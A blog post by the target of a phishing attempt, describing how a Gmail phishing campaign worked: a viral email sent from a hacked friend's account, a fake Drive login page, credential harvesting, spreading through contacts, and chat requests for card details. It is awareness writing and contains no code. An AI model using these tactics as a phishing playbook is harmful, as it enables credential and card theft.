Social engineering for stealing money
I am not writing it to promote black-hat hacking, but to make people aware of the simple things they should keep in mind before entering any credentials or sharing confidential information on the internet.
Introduction
So, someone tried to hack me today. This was by far the best attempt at stealing my credit card information yet. I’ll be honest, for a second, I was about to give away my details. This article kind-of reverse engineers the whole process.
I am assuming the hacker to be a 17 year old male computer genius, working in a dark room, mess all around. Staring at the black console window, while sipping his coffee… Like in movies. Except, this guy is real.
Step 1 : Hacking the Gmail Passwords
We don’t need data to know that a LOT of people use Gmail for pretty much all their email requirements. So it makes a lot of sense to somehow get gmail passwords. So the attacker chose to create a phishing page to make it work.
To make it work, he sent a socially engineered message, that went viral.
Some great things about this email includes using a neutral language(1). A lot of people, if not all are expected to open this link if received from a friend. To make the whole “getting hacked” experience feel natural, the hacker used Google Drive. Something we all know about…
Best thing about this mail was that it was sent right from the inbox of my friend (who got hacked).
Use of bcc (see 2nd point above) was alarming enough for me…
Step 2: Google Drive? Let’s take you to google drive
Clicking on 3 in the above screenshot will take you to this link which looks something like:
http://googledrive.com/host/0B52qLeM0MApRa0lCQ2ltSFBVRE0 (DON’T ENTER YOUR DETAILS AFTER CLICKING)
So, what makes it harder to predict that it’s a phishing attack is that it’s hosted on GoogleDrive.com. This is smart!
A lot of people see the url to figure out that they are under phishing attack.
So, the person who clicks for a Google doc is actually taken to a google drive page asking you to login to continue.
If you open suspicious links in Incognito Mode, like me, you get more hints as it will ask you to login before getting to this page. This is a probably a mistake. This page should have been public, like every other login page. Hacker lost me at this stage.
Another mistake on this phishing page is not changing the page title (see point 1 in the above image). The page says “Google Drive. One Storage” and the title says “GoogleMail Storage”. Hacker probably won’t get through his interview at Google.
Step 3: It’s alright, nothing happened
Now some of us still don’t understand that they are attacked. In this case, hacker used the phishing page to POST data to the following URL:
I am hoping to get access to xyz.php to find out more on what is happening on the server side. From the back-box perspective, it’s saving whatever data is being poured on it and redirecting the user to an actual Google Doc.
From the last couple of hours, I can see a lot of people coming on the Google Doc page. I really hope they are not victim of the attack.
Step 4: Let’s make it viral
So the hacker has access to your login credentials now. It’s easy to login and send the same mail to all your contacts and hope to get a few more victims.
PS: I still don’t know if this hacker used scripts to send the same email to all contacts or did it manually. I am talking to a few victims, will figure this out hopefully.
Step 5: Get some credit card numbers
So, the hacker logged into victims account and sent messages to contacts. Some of the messages exchanged between us:
These are the messages exchanged between me and my friend. We are friends from last 18+ years, we normally talk in local language. So the formal language used by the hacker saved me from sharing my credit card details.
A lesson learnt: Always, start a video call for sharing the credit card details. You never know who might be behind that chat window.
Conclusion
Although it may look like a get-rich-quick scheme. It is nearly impossible to stay anonymous during this process. Eventually you’ll be caught, and lose the money quicker. Not to mention, you may have to spend several years in Jail, that you can otherwise spend earning money as a free man.
This article is mostly a work in progress. I will share more details on the attack as and when I get it.
[Advertisement]
Need a kick-ass UX designer? Drop a line to jagriti.pande@gmail.com
